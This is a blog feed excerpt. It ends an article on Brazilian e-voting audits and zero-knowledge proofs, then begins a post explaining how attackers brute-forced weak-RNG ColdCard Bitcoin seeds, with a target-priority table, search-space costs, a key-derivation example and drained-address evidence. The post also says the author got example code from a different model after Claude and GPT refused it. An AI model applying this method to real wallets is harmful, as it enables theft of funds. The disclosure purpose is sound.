<li><strong>RDV — the &ldquo;digital recount&rdquo;.</strong> The machine records each individual vote in a shuffled, anonymized file, published afterwards (<a href="https://www.tse.jus.br/legislacao/compilada/res/2021/resolucao-no-23-673-14-de-dezembro-de-2021"target="_blank" rel="noopener">definition in TSE Resolution 23.673/2021</a>). Parties and authorized entities can re-sum the votes and cross-check against the BUs and the official tally — the official mechanism presented as the substitute for a paper recount (<a href="https://www.tse.jus.br/eleicoes/historia/processo-eleitoral-brasileiro/votacao/votacao-segura"target="_blank" rel="noopener">the electoral court&rsquo;s explanation</a>).</li>
<li><strong>External audits.</strong> In 2022, the federal audit court (TCU) cross-checked 9 million records from 4,577 precincts against the tallying database and found zero discrepancies — probability of fraud &ldquo;approaching 0%&rdquo; (<a href="https://www.cnnbrasil.com.br/politica/auditoria-do-tcu-diz-que-possibilidade-de-fraude-nas-eleicoes-de-2022-e-proxima-de-0/"target="_blank" rel="noopener">CNN Brasil</a>). The Carter Center observed the 2022 elections, registered no evidence of fraud, and acknowledged the audits&rsquo; expansion (<a href="https://www.cartercenter.org/news/pr/2022/brazil-100522-portuguese.pdf"target="_blank" rel="noopener">mission statement</a>).</li>
</ul>
<p>Now the &ldquo;but&rdquo; this whole article builds toward: <strong>every layer on that list depends on software or on a ceremony run by the electoral court itself.</strong> The BU × RDV comparison proves internal consistency — that the published numbers match the recorded numbers. It does not prove the recorded numbers reflect what voters pressed on the screen, because a tampered machine would produce a tampered BU and RDV in perfect mutual agreement. As Aranha himself puts it: every audit available today depends on the software; if the program is tampered with, every check falls together (<a href="https://www1.folha.uol.com.br/poder/2021/06/so-brasil-bangladesh-e-butao-usam-urna-eletronica-sem-comprovante-do-voto-impresso.shtml"target="_blank" rel="noopener">Folha de S.Paulo</a>). And the Integrity Test, which covers a small sample of machines, is a poor cousin of the Benaloh challenge from Building block 4: instead of each voter auditing their own ballot on the spot, the auditing is done by a sample drawn and conducted by the system itself.</p>
<p>There&rsquo;s also the legal chapter: the attempt to create a voter-verifiable paper record, the &ldquo;printed vote,&rdquo; was ruled unconstitutional by the Supreme Court in ADI 4543 over ballot-secrecy risks, and the attempt to revive it was struck down again in 2020 (<a href="https://conjur.com.br/2020-set-16/supremo-confirma-liminar-impede-volta-voto-impresso/"target="_blank" rel="noopener">Conjur</a>). The irony is that this article&rsquo;s scheme resolves exactly the conflict that killed the printed vote: a verifiable receipt <strong>without</strong> breaking secrecy, via commitments and ZK proofs. The math unlocks what paper couldn&rsquo;t. Everything else stays locked, as the previous sections explain.</p>
<p>So the honest verdict: the Brazilian system is auditable in real digital and procedural ways, and no fraud altering an outcome has ever been proven in nearly 30 years of electronic voting. But there is no software-independent recount, because there is no voter-verified physical record. In the language of election-security research, a true <em>risk-limiting audit</em> is not possible. Trust stays deposited in the software, the pre-election inspections, and the custody of digital records — exactly what this article&rsquo;s hypothetical system tries to eliminate.</p>
<h2>Appendix 2: skin in the game — rewarding those who verify<span class="hx:absolute hx:-mt-20" id="appendix-2-skin-in-the-game--rewarding-those-who-verify"></span>
    <a href="#appendix-2-skin-in-the-game--rewarding-those-who-verify" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>One question hangs in the air after assembling the whole scheme: cryptocurrencies work because someone has something to lose. In Bitcoin, the miner burns real energy; in proof-of-stake, the validator deposits capital that gets confiscated if they cheat. And the voter? Voting costs nothing, and checking the receipt at home is work you do for free. The entire system depends on people verifying — and nobody has an incentive to verify. Can you put <em>skin in the game</em> on the voter?</p>
<p>The first idea that comes to mind is a deposit: vote, deposit some money, get it back later through the income tax system. As mechanism design, it has logic — it prices fake identities: a million phantom votes would cost a hundred million reais. In practice, it dies in three places. It&rsquo;s a disguised poll tax, exclusionary and unconstitutional — the refund fixes the accounting, not the cash flow of someone who doesn&rsquo;t have the money to front. The &ldquo;income tax&rdquo; channel doesn&rsquo;t reach most poor Brazilians, who don&rsquo;t even file — so it excludes exactly who the system most needs to include. And it would build, at the tax authority, a database linking identity, bank account, and electoral participation — a surveillance regression bigger than the problem it solves. All that before the plutocratic detail: security priced in money is security buyable by those who have money. Elections are designed to be wealth-blind — one vote per person. Putting a price on the security layer invites the rich to be more equal than the others.</p>
<p>The version that survives this scrutiny flips the sign: instead of charging to vote, <strong>reward those who verify</strong>. The scheme&rsquo;s real soft spot is the individual verification rate — if nobody checks their serial at home, the inclusion proof from Building block 3 becomes decoration. So: every verified receipt enters a public, auditable lottery, with the tree&rsquo;s own root serving as the randomness source (one more use for it). Checked your vote in the tree? You&rsquo;re in the drawing for a prize. The incentive points exactly at the behavior the system needs — millions of eyes checking the tree — without excluding anyone, charging anything, or building a new database, because the lottery runs on the anonymous serial, not on identity.</p>
<p>It&rsquo;s Bitcoin&rsquo;s logic on the right side: there, the block reward pays thousands of machines to keep the ledger honest; here, the prize would pay millions of voters to keep the election honest. It&rsquo;s almost a <em>proof of verification</em>: the block reward pays for the hashing work that keeps Bitcoin going, and the prize would pay for the checking work that would keep the election going. It&rsquo;s not a proposal — like nothing in this article — but as an incentive-design exercise, it&rsquo;s the version I&rsquo;d put on paper.</p>
<h2>Appendix 3: why &ldquo;zero knowledge&rdquo; is so hard to swallow<span class="hx:absolute hx:-mt-20" id="appendix-3-why-zero-knowledge-is-so-hard-to-swallow"></span>
    <a href="#appendix-3-why-zero-knowledge-is-so-hard-to-swallow" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If you made it here feeling like you understood each piece individually but wouldn&rsquo;t swear you understood the whole thing, relax: you&rsquo;re in excellent company. When Goldwasser, Micali, and Rackoff formalized zero-knowledge proofs in the 1980s, the idea sounded paradoxical even to career cryptographers. Every proof we&rsquo;d ever known worked by <em>showing</em> something. How can a proof transfer conviction while transferring no information at all?</p>
<p>The math from Building blocks 2 through 5 is the complete answer, but intuition lags behind. So here are two classic analogies involving no equations at all — each one lights up half of the concept.</p>
<p><strong>Where&rsquo;s Waldo?</strong> I claim I found Waldo on the page, and I want to prove it without revealing where he is — otherwise you win the game for free. The solution: I take a huge sheet of cardboard, much bigger than the book, cut a small hole in the middle, and place it over the page so only Waldo shows through. You see Waldo. But since the cardboard covers everything around him, you have no idea which corner of the page he&rsquo;s in. I proved I know the location; you learned zero about it. And notice what holds the proof up: if I didn&rsquo;t know where he was, I couldn&rsquo;t have positioned the cardboard — the odds of landing the hole on Waldo by luck are tiny. It&rsquo;s Ali Baba&rsquo;s cave all over again, this time with cardboard.</p>
<p><strong>The color-blind friend&rsquo;s two balls.</strong> Your friend is red-green color-blind. You have two balls identical in size, weight, and texture — one red, one green — and you claim: &ldquo;these balls are different colors.&rdquo; To him, they&rsquo;re indistinguishable. How do you prove it without revealing which is which? He shows you the balls, one in each hand. He puts his hands behind his back and decides, on his own, whether to swap them or not. He shows them again and asks: &ldquo;did I swap?&rdquo; You, who see the colors, answer correctly every time. He, who doesn&rsquo;t, couldn&rsquo;t do better than 50%. After 20 correct answers in a row, he&rsquo;s convinced the balls differ — the odds of you bluffing 20 rounds are one in a million. And what did he learn about which ball is red? <strong>Nothing.</strong> Every answer you gave (&ldquo;swapped&rdquo;, &ldquo;didn&rsquo;t swap&rdquo;) was something he already knew — after all, he was the one who decided whether to swap. The round&rsquo;s information was already his; the only new thing is the conviction that you can see the difference.</p>
<p>The formal version of that intuition is the simulator from Building block 5: if anyone, knowing no secret at all, can fabricate a &ldquo;recording&rdquo; of a proof session indistinguishable from a real one, then the real session cannot carry any information about the secret. The convincing power comes from the order of operations — commitment first, challenge after. The zero knowledge comes from the recording, on its own, being forgeable. Both things are true at the same time, for different reasons. That&rsquo;s why the concept feels slippery: you&rsquo;re holding two facts that seem to contradict each other until you notice each one rests on something different.</p>
<p>And if the concept still feels slippery after all of this, good: you&rsquo;ve just experienced the article&rsquo;s central argument firsthand.</p>
]]></content:encoded><category>politics</category><category>security</category><category>tutorials</category></item><item><title>Exploiting Coinkite's RNG Egregious Problem</title><link>https://www.akitaonrails.com/en/2026/08/01/exploiting-coinkites-rng-egregious-problem/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/01/exploiting-coinkites-rng-egregious-problem/</guid><pubDate>Sat, 01 Aug 2026 09:00:00 GMT</pubDate><description>&lt;p&gt;Yesterday I published the practical warning: &lt;a href="https://www.akitaonrails.com/en/2026/07/31/urgent-if-you-keep-bitcoin-on-a-coldcard-move-everything/"&gt;if you keep Bitcoin on a ColdCard, move everything&lt;/a&gt;. Today I will show &lt;strong&gt;how&lt;/strong&gt; it works from the attacker&amp;rsquo;s side. This is not a tutorial for stealing; it is a didactic explanation of a bug class that few people know from the inside, using real blockchain data and code any programmer can read.&lt;/p&gt;
&lt;p&gt;The didactic code in this article was generated with &lt;strong&gt;Kimi K3&lt;/strong&gt;. It is worth noting that, given the same prompt, both &lt;strong&gt;Claude&lt;/strong&gt; and &lt;strong&gt;GPT&lt;/strong&gt; refused to produce the same kind of example — both cited risk of malicious use, even though the goal here is exactly the opposite: to show why the vulnerability works so victims understand the risk and can protect themselves.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Yesterday I published the practical warning: <a href="/en/2026/07/31/urgent-if-you-keep-bitcoin-on-a-coldcard-move-everything/">if you keep Bitcoin on a ColdCard, move everything</a>. Today I will show <strong>how</strong> it works from the attacker&rsquo;s side. This is not a tutorial for stealing; it is a didactic explanation of a bug class that few people know from the inside, using real blockchain data and code any programmer can read.</p>
<p>The didactic code in this article was generated with <strong>Kimi K3</strong>. It is worth noting that, given the same prompt, both <strong>Claude</strong> and <strong>GPT</strong> refused to produce the same kind of example — both cited risk of malicious use, even though the goal here is exactly the opposite: to show why the vulnerability works so victims understand the risk and can protect themselves.</p>
<p>The goal is to answer, line by line, a question many people asked: &ldquo;if the ColdCard stays offline, how did the bitcoins disappear?&rdquo;.</p>
<blockquote>
  <p><strong>Warning:</strong> the code here is educational. Running it against addresses that are not yours is a crime. Use it to understand the risk, test your own seeds in a controlled environment, and reinforce why you need to generate fresh entropy.</p>

</blockquote>
<h2>Summary of the previous post<span class="hx:absolute hx:-mt-20" id="summary-of-the-previous-post"></span>
    <a href="#summary-of-the-previous-post" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Between March 2021 and the July 2026 fix, several ColdCard firmwares generated seeds from a deterministic generator instead of the hardware TRNG. The blame lies in a botched integration: the macro <code>MICROPY_HW_ENABLE_RNG</code> was defined as <code>0</code>, but the guard in <code>libNgU</code> used <code>#ifndef</code>, which only asks whether the symbol exists. The build succeeded, the <code>rng_get()</code> call fell through to MicroPython&rsquo;s <a href="http://www.literatecode.com/yasmarang"target="_blank" rel="noopener">Yasmarang</a> software fallback, and the seed became a product of the microcontroller UID and timing registers.</p>
<p>For readers who do not work with hardware, here is what those acronyms mean:</p>
<ul>
<li><strong>UID</strong> (<em>Unique Identifier</em>) is the serial number burned into the microcontroller chip at the factory. In the STM32F4 used by the ColdCard, it is 96 bits long — something like <code>0x4A3F B201 C847 D5E9 1234 5678</code>. Every chip leaves the assembly line with a different UID, but it is fixed and can be read by software. If the attacker knows (or can constrain) this number, they eliminate one of the unknowns.</li>
<li><strong>RTC</strong> (<em>Real-Time Clock</em>) is the microcontroller&rsquo;s real-time clock. In a PC, that clock is usually backed by a coin-cell battery and keeps running while the machine is off. <strong>The ColdCard has no such battery.</strong> On Mk2/Mk3 the RTC oscillator is disabled at startup, which strongly suggests that the <code>RTC-&gt;TR</code> and <code>RTC-&gt;SSR</code> registers read as zero or a static value every time the device cold-boots. On Mk4/Q/Mk5 an RTC source is configured but marked unused, and MicroPython&rsquo;s RTC initialization remains disabled. In other words, &ldquo;time&rdquo; is not a fresh entropy source here — it is another fixed or predictable value that an attacker can profile.</li>
<li><strong>SysTick</strong> is another timer, this one inside the ARM core itself, counting at high speed — typically from 0 to <code>0x00FFFFFF</code> and rolling over. When the firmware reads this counter at seed-creation time, it captures a value like <code>0x003D7A12</code>. Because the RTC likely does not vary across cold boots, SysTick becomes practically the only dynamic element of the initial state. <a href="https://engineering.block.xyz/blog/predictable-rng-fallback-and-32-bit-reseed-in-coldcard-firmware"target="_blank" rel="noopener">Block</a> estimates that, by itself, it can shrink the space to ~80,000 possibilities (~16 bits).</li>
</ul>
<p>Block&rsquo;s <a href="https://engineering.block.xyz/blog/predictable-rng-fallback-and-32-bit-reseed-in-coldcard-firmware"target="_blank" rel="noopener">independent analysis</a> and Coinkite&rsquo;s <a href="https://blog.coinkite.com/entropy-technical-backgrounder/"target="_blank" rel="noopener">technical backgrounder</a> agree on the mechanism, although they differ on impact details. Yesterday&rsquo;s post has the full affected-firmware table.</p>
<p>The central point is: <strong>the effective entropy dropped from at least 128 bits to roughly 40 bits on the Mk3 and 72 bits (with caveats) on newer models.</strong> Forty bits are not secure. They are enumerable with cheap hardware.</p>
<h2>The wallet does not sit &ldquo;inside&rdquo; the ColdCard<span class="hx:absolute hx:-mt-20" id="the-wallet-does-not-sit-inside-the-coldcard"></span>
    <a href="#the-wallet-does-not-sit-inside-the-coldcard" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before diving into the attack, repeat the basics. Bitcoin does not sit inside the device. The public blockchain contains UTXOs — transaction outputs — locked by scripts. What your wallet stores is the material to produce signatures that satisfy those scripts.</p>
<p>In the most common case, a native SegWit address is derived from a public key, which in turn comes from a private key, which is just an integer inside the domain of the <code>secp256k1</code> curve. Whoever knows the integer can sign. Whoever does not, cannot.</p>
<p>That is why the ColdCard can be powered off, battery-less, inside a safe. The attacker does not need to touch it. They only need to reproduce the same integer that the device drew. With a weak RNG, that stops being impossible and becomes a small search space.</p>
<p>You can see any wallet on the blockchain. Just paste an address or xpub into an explorer like <a href="https://mempool.space"target="_blank" rel="noopener">mempool.space</a>. The explorer shows balance, UTXOs, and history because that data is public by design. The ColdCard, Ledger, Sparrow, Electrum — none of them &ldquo;hold&rdquo; your bitcoins; they only keep the keys that let you spend the UTXOs in the global ledger.</p>
<h2>How the attacker prioritizes models<span class="hx:absolute hx:-mt-20" id="how-the-attacker-prioritizes-models"></span>
    <a href="#how-the-attacker-prioritizes-models" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Not all models are equally easy to attack. The priority order follows the search-space size:</p>
<table>
  <thead>
      <tr>
          <th>Model / firmware</th>
          <th>What the attacker must guess</th>
          <th>Approximate space</th>
          <th>Priority</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Mk2/Mk3 v4.0.0–v4.1.9</td>
          <td>Chip UID, timer state, RNG call history</td>
          <td>~40 bits in Coinkite&rsquo;s model; deterministic if everything is known</td>
          <td><strong>1st — attack first</strong></td>
      </tr>
      <tr>
          <td>Mk4/Q/Mk5 without successful reseed</td>
          <td>Same fallback as above, with possible silent secure-element failure</td>
          <td>~41 bits</td>
          <td><strong>2nd</strong></td>
      </tr>
      <tr>
          <td>Mk4/Q/Mk5 with normal reseed</td>
          <td>Fallback state + 32 bits from secure element</td>
          <td>~72 bits raw, of which 32 bits are real added secret</td>
          <td><strong>3rd — more expensive</strong></td>
      </tr>
      <tr>
          <td>Mk1; Mk2/Mk3 up to v3.2.2</td>
          <td>Hardware TRNG working</td>
          <td>~256 bits</td>
          <td>unreachable</td>
      </tr>
  </tbody>
</table>
<p>Why is the Mk3 the easiest? Because it has no cryptographic contribution from a secure element. The Yasmarang fallback is fully deterministic given the UID and timer state. If the attacker knows (or can constrain) those values, there is no residual secret. Coinkite estimates the effective space at about 40 bits; <a href="https://engineering.block.xyz/blog/predictable-rng-fallback-and-32-bit-reseed-in-coldcard-firmware"target="_blank" rel="noopener">Block</a> shows that, because Mk2/Mk3 RTC values likely start at zero or a static value on cold boot, SysTick alone limits the space to ~80,000 values, i.e. ~16 bits.</p>
<p>On Mk4/Q/Mk5 the secure-element reseed adds 32 bits. That is enough to make the attack much more expensive — but still far from the acceptable 128-bit minimum. Block also points out a source path where a caught exception during initialization can prevent the reseed, falling back to the smaller space.</p>
<p>A rational attacker starts with the biggest return: Mk2/Mk3 v4. Only with leftover resources do they move to Mk4/Q/Mk5.</p>
<h2>128 bits, 40 bits, and 72 bits: what is the difference?<span class="hx:absolute hx:-mt-20" id="128-bits-40-bits-and-72-bits-what-is-the-difference"></span>
    <a href="#128-bits-40-bits-and-72-bits-what-is-the-difference" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Bits measure the size of the search space. Each extra bit doubles the work. The difference is not small — it is exponential.</p>
<p>Imagine you can test <strong>1 billion candidates per second</strong>:</p>
<table>
  <thead>
      <tr>
          <th>Bits</th>
          <th>Candidates</th>
          <th>Time to search exhaustively</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>40</td>
          <td>~1.1 trillion</td>
          <td>~18 minutes</td>
      </tr>
      <tr>
          <td>72</td>
          <td>~4.7 sextillion</td>
          <td>~150,000 years</td>
      </tr>
      <tr>
          <td>128</td>
          <td>~3.4 × 10³⁸</td>
          <td>~10²² years (many orders of magnitude beyond the age of the universe)</td>
      </tr>
  </tbody>
</table>
<p>Another way to picture it: 40 bits is like finding a specific leaf in a small forest. 72 bits is like finding a specific grain of sand on all the beaches on Earth. 128 bits is like finding a specific atom among the atoms of thousands of planets.</p>
<p>That is why 40 bits is not &ldquo;slightly less secure&rdquo; than 128. It is a completely different category: practical to attack with common hardware. 72 bits already demands serious resources, but still falls short of the acceptable minimum for storing value. 128 bits is the standard because, with known computing power, it cannot be beaten.</p>
<h2>From an integer to a wallet<span class="hx:absolute hx:-mt-20" id="from-an-integer-to-a-wallet"></span>
    <a href="#from-an-integer-to-a-wallet" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Below is a real example of how a number (the entropy) becomes a seed, a private key, and an address. I used 16 bytes (128 bits) just to fit on one line; the ColdCard used 32 bytes, but the idea is the same.</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">embit.bip39</span> <span class="kn">import</span> <span class="n">mnemonic_from_bytes</span><span class="p">,</span> <span class="n">mnemonic_to_seed</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">embit.bip32</span> <span class="kn">import</span> <span class="n">HDKey</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">embit.script</span> <span class="kn">import</span> <span class="n">p2wpkh</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">entropy</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s2">&#34;0123456789abcdef0123456789abcdef&#34;</span><span class="p">)</span>  <span class="c1"># 128 bits</span>
</span></span><span class="line"><span class="cl"><span class="n">mnemonic</span> <span class="o">=</span> <span class="n">mnemonic_from_bytes</span><span class="p">(</span><span class="n">entropy</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">seed</span> <span class="o">=</span> <span class="n">mnemonic_to_seed</span><span class="p">(</span><span class="n">mnemonic</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">root</span> <span class="o">=</span> <span class="n">HDKey</span><span class="o">.</span><span class="n">from_seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">root</span><span class="o">.</span><span class="n">derive</span><span class="p">(</span><span class="s2">&#34;m/84&#39;/0&#39;/0&#39;/0/0&#34;</span><span class="p">)</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Output:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">entropy (128 bits): 0123456789abcdef0123456789abcdef
</span></span><span class="line"><span class="cl">mnemonic (12 words): abuse boss fly battle rubber wasp afraid hamster guide essence vibrant tattoo
</span></span><span class="line"><span class="cl">seed (64 bytes): a3a99acc7fe076cdc923d0ae79ee735671d8d70a79de19593cca8638f3194251...
</span></span><span class="line"><span class="cl">root xprv: xprv9s21ZrQH143K25JhKqEwvJW7QAiVvkmi4WRenBZanA6kxHKtKAQQKwZG65kC...
</span></span><span class="line"><span class="cl">private key (integer): 1332683685242456724974769347593961509584253593377187298409830148921683854281
</span></span><span class="line"><span class="cl">address: bc1qxjayuwxqj04waw2j4xp5mlhjl47dzdl9mcjmnw</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The private key is just an integer. From it, the <a href="/2019/11/26/akitando-68-entendendo-conceitos-basicos-de-criptografia-parte-2-2/">elliptic curve</a> computes the public key; the public key is hashed into the address. The address is what appears on the blockchain; the integer is what lets you spend.</p>
<p>In the ColdCard case, the integer did not have 128 bits of real randomness. It had ~40. So instead of searching for a needle in the universe, the attacker was searching for a needle in a small forest.</p>
<h2>Real evidence on the blockchain<span class="hx:absolute hx:-mt-20" id="real-evidence-on-the-blockchain"></span>
    <a href="#real-evidence-on-the-blockchain" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I am not making up numbers. The independent site <a href="https://coldcard-watch.vercel.app/"target="_blank" rel="noopener">coldcard-watch.vercel.app</a> has been tracking the drains transaction by transaction and publishes the verified minimum: <strong>1,128.6633 BTC</strong> drained from <strong>2,334 confirmed addresses</strong>. The site itself stresses that these are <strong>verified minimums, not totals</strong> — other clusters likely exist.</p>
<p>It identifies two draining episodes:</p>
<ul>
<li><strong>July 30, 2026</strong>, blocks <strong>960183 to 960191</strong> — 1,195 addresses drained.</li>
<li><strong>July 31, 2026</strong>, blocks <strong>960345 to 960369</strong> — 1,126 addresses drained.</li>
</ul>
<p>The main public clusters making up that minimum include:</p>
<ul>
<li><a href="https://mempool.space/address/bc1qnk4zh9qcnap2mycp56qjrgza3cc8ylrh8fecp0"target="_blank" rel="noopener"><code>bc1qnk4zh9qcnap2mycp56qjrgza3cc8ylrh8fecp0</code></a> — <a href="https://mempool.space/address/bc1qnk4zh9qcnap2mycp56qjrgza3cc8ylrh8fecp0"target="_blank" rel="noopener">received 594.47723261 BTC</a> in 501 outputs.</li>
<li><a href="https://mempool.space/address/bc1qx76cae2706qd5q576feh7xq8rfcsjpf2htfhe3"target="_blank" rel="noopener"><code>bc1qx76cae2706qd5q576feh7xq8rfcsjpf2htfhe3</code></a> — <a href="https://mempool.space/tx/14edd9ee8445793c320e92e3b50365a0e18b8b25f424044bce337463f007fdd2"target="_blank" rel="noopener">received ~398.476 BTC</a> in a single transaction with 491 inputs (<a href="https://mempool.space/tx/14edd9ee8445793c320e92e3b50365a0e18b8b25f424044bce337463f007fdd2"target="_blank" rel="noopener"><code>14edd9ee...</code></a>).</li>
<li><a href="https://mempool.space/address/bc1q8jy96fe5lf8vfugydnte3cguk92gpev7kwtp3q"target="_blank" rel="noopener"><code>bc1q8jy96fe5lf8vfugydnte3cguk92gpev7kwtp3q</code></a> — <a href="https://mempool.space/tx/4b50d61a3d6e54c62ee0be13d7e9a8b69bffe7fc2b2cab4e14da56e4e20440d2"target="_blank" rel="noopener">received ~89.623 BTC</a> in a single transaction with 204 inputs (<a href="https://mempool.space/tx/4b50d61a3d6e54c62ee0be13d7e9a8b69bffe7fc2b2cab4e14da56e4e20440d2"target="_blank" rel="noopener"><code>4b50d61a...</code></a>).</li>
</ul>
<p>Just these three clusters already sum to ~1,082 BTC; the remaining verified transactions bring the confirmed minimum to <strong>1,128.6633 BTC</strong>.</p>
<blockquote>
  <p>The first cluster moved ~562 BTC to <a href="https://mempool.space/address/bc1qq85v2c926eg6pgxhwp6q7lf6cnsz80qs3fcu9r"target="_blank" rel="noopener"><code>bc1qq85v2c926eg6pgxhwp6q7lf6cnsz80qs3fcu9r</code></a>; that is the same money, not a fourth victim.</p>

</blockquote>
<p>A concrete example: transaction <a href="https://mempool.space/tx/78ac8968ccf5a586d2fb9509f5af13f41e0a288bfa0f0b177d4e4b6bbebad05d"target="_blank" rel="noopener"><code>78ac8968ccf5a586d2fb9509f5af13f41e0a288bfa0f0b177d4e4b6bbebad05d</code></a> consolidates three inputs from the same vulnerable address <a href="https://mempool.space/address/bc1qe85jr4em79p66fsszkvfhwjf6p6qst58a2ahlr"target="_blank" rel="noopener"><code>bc1qe85jr4em79p66fsszkvfhwjf6p6qst58a2ahlr</code></a>, one of them almost <strong>29.9 BTC</strong>. All three inputs use the same compressed public key:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><pre><code>037dc5356b71d0209d5d97315450166c07e7bba67d2e53c0154f5c56eb06f6970e</code></pre></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>So three different UTXOs, same owner, same private key. The attacker found that key and signed all of them at once.</p>
<p>Other source addresses with large values include <a href="https://mempool.space/address/bc1qvshd3nv6mjjs5wtk6x5ekppakdp2trqcsdvwlf"target="_blank" rel="noopener"><code>bc1qvshd3nv6mjjs5wtk6x5ekppakdp2trqcsdvwlf</code></a> (~24.08 BTC), <a href="https://mempool.space/address/bc1q30363smzw6uk5n2znj65mf9432s0e3d92e3fu5"target="_blank" rel="noopener"><code>bc1q30363smzw6uk5n2znj65mf9432s0e3d92e3fu5</code></a> (~14.43 BTC), and <a href="https://mempool.space/address/bc1qgzxfgqgvnle9p6kksk35t54ycu2tx2hwau5ppw"target="_blank" rel="noopener"><code>bc1qgzxfgqgvnle9p6kksk35t54ycu2tx2hwau5ppw</code></a> (~11.74 BTC). You can click each one and watch the UTXOs move to a consolidation address.</p>
<p>Bitcoin Optech <a href="https://bitcoinops.org/en/newsletters/2026/07/31/#wallets-generated-by-coldcard-at-risk-of-theft"target="_blank" rel="noopener">issue 416</a> estimated losses above 1,000 BTC while the case was still unfolding; the independent tracker now confirms <strong>at least 1,128.6633 BTC stolen</strong>.</p>
<h2>What the blockchain timeline suggests about attack order<span class="hx:absolute hx:-mt-20" id="what-the-blockchain-timeline-suggests-about-attack-order"></span>
    <a href="#what-the-blockchain-timeline-suggests-about-attack-order" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="https://coldcard-watch.vercel.app/"target="_blank" rel="noopener">coldcard-watch</a> shows <strong>two distinct episodes</strong>, separated by more than 24 hours. The first happened between blocks 960183 and 960191 (July 30, around 01:10 UTC); the second between 960345 and 960369 (July 31). Within the first episode, the three large clusters (~594, ~398, and ~89 BTC) were mined in consecutive blocks — so within each wave, the sweeps were launched almost simultaneously.</p>
<p>This two-wave pattern fits two interpretations:</p>
<ol>
<li><strong>Same attacker, pre-computed in batches.</strong> The first wave grabs the easiest, best-funded targets; the second wave comes from a second batch of already pre-computed candidates.</li>
<li><strong>Multiple attackers.</strong> After the flaw became public, other actors joined with their own dictionaries of likely states.</li>
</ol>
<p>Either way, the economics of the attack favor the order in the table above. Mk2/Mk3 v4 is the best return on compute:</p>
<ul>
<li><strong>~40 bits of effective entropy</strong> ≈ 2^40 ≈ <strong>1.1 trillion</strong> candidate states.</li>
<li>On a GPU testing 1 million candidates per second (including BIP32 derivation and explorer lookup), that would take about <strong>13 days</strong> to search exhaustively. With 100 GPUs/FPGAs, it drops to <strong>a few hours</strong>.</li>
